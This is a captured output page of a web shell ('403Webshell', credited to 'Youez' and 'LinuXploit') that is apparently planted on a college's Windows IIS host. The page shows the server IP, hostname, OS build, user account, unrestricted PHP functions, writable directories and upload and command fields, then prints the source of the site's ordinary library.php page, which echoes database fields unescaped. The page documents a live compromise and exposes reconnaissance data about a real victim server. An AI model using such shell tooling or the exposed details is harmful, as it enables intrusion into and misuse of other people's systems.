403Webshell
Server IP : 50.63.8.194  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB026 10.0 build 17763 (Windows Server 2016) AMD64
User : IWPD_7824(SpiPanel) ( 0)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/library.php
<?php

$title = "Library";

include('../admin/connection.php');
$q_vid = "select * from tbl_video as tv join tbl_department as td on tv.branch=td.dept_id order by tv.v_id desc";
$res_vid = mysqli_query($dbCon, $q_vid);

?>
<!DOCTYPE html>
<html lang="en">


<head>

    <?php
include('../home_include/header_link.php');
?>


</head>

<body>

    <div class="page-wrapper" id="page-wrapper">

        <?php
    include('../home_include/header.php');
    ?>


<!-- page content start  -->






<!-- start inner banner -->
<section class="inner-banner">
    <h1 class="font-weight-bold text-center">Library</h1>
</section>
<!-- end inner banner -->
<!-- start about us -->
<section class="aboutus">
    <div class="container">
        <div class="row">
            <div class="col-lg-6 col-md-12">
                <h1 class="color-orange font-weight-bold about-title" data-aos="fade-up" data-aos-duration="1000">Library</h1>
                <h5 class="font-weight-bold text-uppercase mb-3" data-aos="fade-up" data-aos-duration="1000"></h5>
                <p>   A library is an essential asset for any center of learning which provides facilities and services to meet the requirements of learning and teaching. Hence, our efforts are always directed towards creating and maintaining a very rich library having all important curriculum books and important   journals/ newspapers, encyclopedia, and magazines, etc.</p>
                <p>
                    we have a collection of numerous books and documents. In addition, it has relevant technical magazines for offering many benefits to the students and faculties as well. The libraries goal to obtain the crucial role of supporting learning and teaching activities to all members of the institute These libraries are a physical manifestation of our vision to distinguish the college as a center of resource in the knowledge era. As per AICTE norms, the central library of MMIT has 400+ books.
                </p>
            </div>
            <div class="col-lg-6 col-md-8 offset-md-2 offset-lg-0">
                <div class="about-img">
                    <div class="img_1" data-aos="zoom-in" data-aos-duration="550">
                        <div class="border-line"></div>
                        <img src="../assets/images/about1.jpg" class="img-fluid" alt="About">
                    </div>
                    <div class="img_2 d-flex" data-aos="zoom-in" data-aos-duration="1000">
                        <h5 class="mb-0 text-white">Our Story</h5>
                        <a href="https://www.youtube.com/watch?v=cMweKVkBjec" data-fancybox="gallery" class="video-btn text-white">
                            <i class="fa fa-play-circle fa-3x"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <p class="mt-5">
            <h5 class=" font-weight-bold text-uppercase mb-3" data-aos="fade-up" data-aos-duration="1000">National digital library:</h5>
            <b class="color-orange"> <a href="https://ndl.iitkgp.ac.in/" target="_blank">ndl.iitkgp.ac.in</a></b>

        </p>
    </div>
</section>
<!-- end about us -->
<!-- start target -->
<section class="target">
    <div class="container-fluid">
        <div class="sec-title text-center bg-fill" data-aos="fade-up" data-aos-duration="1000">
            <span class="title">Video Lecture</span>
            <h2 class="text-white">See your lectures recording Here </h2>
            <div class="divider">
                <span class="fa fa-mortar-board"></span>
            </div>
        </div>

        <div class="container-fluid table-responsive" style="max-height:520px; overflow-y:auto;">
            <table class="table text-dark bg-light table-bordered  display" id="videoTable">
                <thead>
                    <tr>
                        <th>Sr No.</th>
                        <th>Topic</th>
                        <th>Branch</th>
                        <th>Year</th>
                        <th>Subject</th>
                        <th>Video</th>
                    </tr>
                </thead>
                <tbody>
                    <?php
                    $i=1;
                    while($row_vid = mysqli_fetch_assoc($res_vid)){
                    ?>
                    <tr>
                        <td><?php echo $i; ?></td>
                        <td><?php echo $row_vid['title']; ?></td>
                        <td><?php echo $row_vid['dept_name']; ?></td>
                        <td><?php echo $row_vid['year']; ?></td>
                        <td><?php echo $row_vid['subject']; ?></td>
                        <td><a href="<?php echo $row_vid['url']; ?>" target="_blank">View Video</a></td>
                    </tr>
                    <?php
                    $i++;
                    }
                    ?>

                </tbody>

            </table>

        </div>
    </div>
</section>
<!-- end target -->

<section class="Library_Books mt-5 mb-3">
    <div class="container-fluid">
        <div class="sec-title text-center">
            <span class="title">Books</span>
            <h2>Available Books In your College Library.</h2>
            <div class="divider">
                <span class="fa fa-mortar-board"></span>
            </div>
        </div>

        <div class="container-fluid table-responsive" style="max-height:520px; overflow-y:auto;">
            <table class="table text-dark bg-light table-bordered  display" id="bookTable">
                <thead>
                    <tr>
                        <th>Sr No.</th>
                        <th>Book Name</th>
                        <th>No Of Copy</th>
                        <th>Author</th>
                        <th>Publisher</th>

                    </tr>
                </thead>

            </table>

        </div>
    </div>

</section>

<section class="events text-center">
    <div class="container-fluid">
        <div class="sec-title text-center">
            <span class="title">What We Gives You</span>
            <h2>Here is some E-Learning facilities provided for you.</h2>
            <div class="divider">
                <span class="fa fa-mortar-board"></span>
            </div>
        </div>
        <div class="center row">
            <div class="card m-2 col-sm ">
                <div class="client-block p-3">

                    <a href="https://www.mooc.org/" target="_blank" /> <img src="../assets/images/icons/mooc.jpg" /></a>

                </div>
            </div>

            <div class="card  m-2 col-sm">
                <div class="client-block p-3">
                    <a href="https://swayam.gov.in/" target="_blank"><img src="../assets/images/icons/swayam.png" /> </a>
                </div>
            </div>

            <div class="card  m-2 col-sm">
                <div class="client-block p-3">

                    <a href="https://www.aicte-india.org/" target="_blank"><img src="../assets/images/icons/AICTE.png" /></a>
                </div>
            </div>
            <div class="card  m-2 col-sm ">
                <div class="client-block p-3">


                    <a href="https://www.ugc.ac.in/" target="_blank"><img src="../assets/images/icons/UGC.jpg" /></a>
                </div>
            </div>
            <div class="card  m-2 col-sm">
                <div class="client-block p-3">


                    <a href="https://aktu.ac.in/" target="_blank"><img src="../assets/images/icons/Aktu.html"></a>
                </div>
            </div>
            <div class="card  m-2 col-sm">
                <div class="client-block p-3">


                    <a href="https://nptel.ac.in/" target="_blank">  <img src="../assets/images/icons/nptel.jpg" /></a>
                </div>
            </div>

        </div>

    </div>
</section>
<!-- end events -->


<div class="container">


</div>



<script src="../../ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script type="text/javascript" src="../../cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>

<script>
    $(document).ready(function () {
        $('#videoTable').DataTable();

    });
    $(document).ready(function () {
        $('#bookTable').DataTable();

    });
</script>






<!-- page content end  -->







        <?php
    include('../home_include/footer.php');
    ?>


    </div>


    <?php
    include('../home_include/footer_link.php');
    ?>

</body>



</html>

Youez - 2016 - github.com/yon3zu
LinuXploit